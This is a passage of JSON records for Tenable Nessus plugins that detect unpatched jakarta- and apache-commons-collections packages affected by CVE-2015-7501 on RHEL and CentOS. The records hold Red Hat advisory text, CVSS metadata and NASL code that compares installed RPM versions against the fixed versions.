script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:2536\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! 
(rpm_exists(release:\"RHEL5\", rpm:\"jbossas-welcome-content-eap\") || rpm_exists(release:\"RHEL6\", rpm:\"jbossas-welcome-content-eap\") || rpm_exists(release:\"RHEL7\", rpm:\"jbossas-welcome-content-eap\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EAP\");\n\n if (rpm_check(release:\"RHEL5\", reference:\"apache-commons-collections-eap6-3.2.1-16.redhat_5.1.ep6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"apache-commons-collections-eap6-3.2.1-16.redhat_5.1.ep6.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"apache-commons-collections-eap6-3.2.1-16.redhat_5.1.ep6.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-commons-collections-eap6\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:45:31", "description": "Updated jakarta-commons-collections packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new interfaces, implementations, and utilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. 
(CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-21T00:00:00", "type": "nessus", "title": "RHEL 5 : jakarta-commons-collections (RHSA-2015:2671)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-debuginfo", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-javadoc", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-testframework", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-testframework-javadoc", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-tomcat5", "cpe:/o:redhat:enterprise_linux:5"], "id": "REDHAT-RHSA-2015-2671.NASL", "href": "https://www.tenable.com/plugins/nessus/87519", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2671. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87519);\n script_version(\"2.18\");\n script_cvs_date(\"Date: 2019/10/24 15:35:40\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2671\");\n\n script_name(english:\"RHEL 5 : jakarta-commons-collections (RHSA-2015:2671)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated jakarta-commons-collections packages that fix one security\nissue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new\ninterfaces, implementations, and utilities to extend the features of\nthe Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. 
Applications that\nrequire those classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to\nthese updated packages, which contain a backported patch to correct\nthis issue. All running applications using the commons-collections\nlibrary must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/solutions/2045023\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:2671\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7501\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:2671\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"jakarta-commons-collections-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"jakarta-commons-collections-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"jakarta-commons-collections-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"jakarta-commons-collections-debuginfo-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"jakarta-commons-collections-debuginfo-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"jakarta-commons-collections-debuginfo-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"jakarta-commons-collections-javadoc-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"jakarta-commons-collections-javadoc-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"jakarta-commons-collections-javadoc-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", 
cpu:\"i386\", reference:\"jakarta-commons-collections-testframework-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"jakarta-commons-collections-testframework-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"jakarta-commons-collections-testframework-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"jakarta-commons-collections-testframework-javadoc-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"jakarta-commons-collections-testframework-javadoc-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"jakarta-commons-collections-testframework-javadoc-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"jakarta-commons-collections-tomcat5-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"jakarta-commons-collections-tomcat5-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"jakarta-commons-collections-tomcat5-3.2-2jpp.4\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-collections / jakarta-commons-collections-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-06T15:30:58", "description": "Updated jakarta-commons-collections packages that fix one security issue are now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Important security impact. 
A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new interfaces, implementations, and utilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. 
All running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-03T00:00:00", "type": "nessus", "title": "CentOS 6 : jakarta-commons-collections (CESA-2015:2521)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:jakarta-commons-collections", "p-cpe:/a:centos:centos:jakarta-commons-collections-javadoc", "p-cpe:/a:centos:centos:jakarta-commons-collections-testframework", "p-cpe:/a:centos:centos:jakarta-commons-collections-testframework-javadoc", "p-cpe:/a:centos:centos:jakarta-commons-collections-tomcat5", "cpe:/o:centos:centos:6"], "id": "CENTOS_RHSA-2015-2521.NASL", "href": "https://www.tenable.com/plugins/nessus/87174", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2521 and \n# CentOS Errata and Security Advisory 2015:2521 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87174);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2521\");\n\n script_name(english:\"CentOS 6 : jakarta-commons-collections (CESA-2015:2521)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated jakarta-commons-collections packages that fix one security\nissue are now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new\ninterfaces, implementations, and utilities to extend the features of\nthe Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that\nrequire those classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to\nthese updated packages, which contain a backported patch to correct\nthis issue. 
All running applications using the commons-collections\nlibrary must be restarted for the update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-December/021512.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cd1e83b8\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jakarta-commons-collections packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7501\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-collections-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/02\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"jakarta-commons-collections-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"jakarta-commons-collections-javadoc-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"jakarta-commons-collections-testframework-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"jakarta-commons-collections-testframework-javadoc-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"jakarta-commons-collections-tomcat5-3.2.1-3.5.el6_7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-collections / jakarta-commons-collections-javadoc / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:45:53", "description": "Updated apache-commons-collections packages that fix one security issue are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important security impact. 
A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Apache Commons Collections library provides new interfaces, implementations, and utilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of apache-commons-collections are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. 
All running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-03T00:00:00", "type": "nessus", "title": "RHEL 7 : apache-commons-collections (RHSA-2015:2522)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:apache-commons-collections", "p-cpe:/a:redhat:enterprise_linux:apache-commons-collections-javadoc", "p-cpe:/a:redhat:enterprise_linux:apache-commons-collections-testframework", "p-cpe:/a:redhat:enterprise_linux:apache-commons-collections-testframework-javadoc", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.2", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2015-2522.NASL", "href": "https://www.tenable.com/plugins/nessus/87179", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2522. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87179);\n script_version(\"2.23\");\n script_cvs_date(\"Date: 2019/10/24 15:35:40\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2522\");\n\n script_name(english:\"RHEL 7 : apache-commons-collections (RHSA-2015:2522)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated apache-commons-collections packages that fix one security\nissue are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Apache Commons Collections library provides new interfaces,\nimplementations, and utilities to extend the features of the Java\nCollections Framework.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. 
Applications that\nrequire those classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of apache-commons-collections are advised to upgrade to\nthese updated packages, which contain a backported patch to correct\nthis issue. All running applications using the commons-collections\nlibrary must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:2522\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7501\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:apache-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. 
